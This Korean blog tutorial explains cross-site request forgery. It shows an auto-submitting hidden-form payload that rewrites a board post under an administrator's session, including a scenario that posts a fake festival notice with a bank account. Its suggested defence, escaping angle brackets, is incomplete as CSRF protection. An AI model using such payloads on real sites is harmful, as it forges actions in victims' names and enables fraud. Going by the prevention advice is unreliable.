일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- Container
- 데이터베이스
- 라우팅프로토콜
- Cosmos
- coding test
- 컨테이너
- TDD
- 코딩테스트
- MySQL
- 도커
- Linux
- Snort Rule
- 라우터
- 스노트 룰
- 트레바리
- Routing
- OSI7계층
- Router
- 프로그래머스
- osi7layer
- database
- 라우팅
- snort
- 스노트
- programmers
- Python
- docker
- db
- 리눅스
- 코딩 테스트
Archives
- Today
- Total
Simple is IT, 누구나 보고 누구나 깨닫는 IT
CSRF (Cross Site Request Forgery) 및 예방법 본문
CSRF(Cross Site Request Forgery) ?
: 스크립트를 이용해 게시글을 조회하는 사용자의 권한으로 사용자가 원하지 않던 작업을 수행
<body onload="document.form_test.submit();">
<form name="form_test" action="board_update_reg.asp" method="POST">
<input type="hidden" name="user" value="관리자">
<input type="hidden" name="title" value="에헤헤헤">
<input type="hidden" name="contents" value="csrf attack">
<input type="hidden" name="idx" value="2">
</form>
'form_test'라는 form tag로 이동해 작업을 수행한다.
작업 내용 : 게시글을 작성하는 페이지로 넘어가 값들을 작성하고 등록함.
example seanario
<body onload="document.form_test.submit();">
<form name="form_test" action="board_update_reg.asp" method="POST">
<input type="hidden" name="user" value="관리자">
<input type="hidden" name="title" value="2020 페스티벌">
<input type="hidden" name="contents" value="2020 페스티벌
기간 : 2020. 10. 10(토) ~ 10. 15(목) 5일간
장소 : 잠실종합운동장
주최 : 서울시
참가비 : 1000원
계좌 : 222-22222-22-222">
<input type="hidden" name="idx" value="29">
</form>
|
관리자가 공지를 등록했다.
진짜 쉬고싶은 해커가 쉬는 기간을 늘리고 싶어 위와 같은 게시물을 작성했다.
이제 관리자가 해당 게시글을 클릭하게되면,
아래 내용과 같이 수정이 된다.
예방법
'< >(꺽새)' 형식의 텍스트를 치환한다.
-> 사용자에게 보여지는 '< >'형식을 코드에서 동작하지 않는 '<'로 치환.(사용자에게는 정상적으로 보임)
'Simple is IT > Security' 카테고리의 다른 글
Metasploit Framework(메타스플로잇 프레임워크, reverse_shell) (0) | 2020.04.27 |
---|---|
nmap을 이용한 Port 정보수집 (0) | 2020.04.27 |
XSS(Cross Site Scripting, BeEF, Session Hijaking) 및 예방법 (0) | 2020.04.27 |
SQL 인젝션 (sqlmap 사용 - Kali Linux) (0) | 2020.04.27 |
WEB 해킹 및 보안 취약점 파악(SQL 인젝션) (0) | 2020.04.27 |
Comments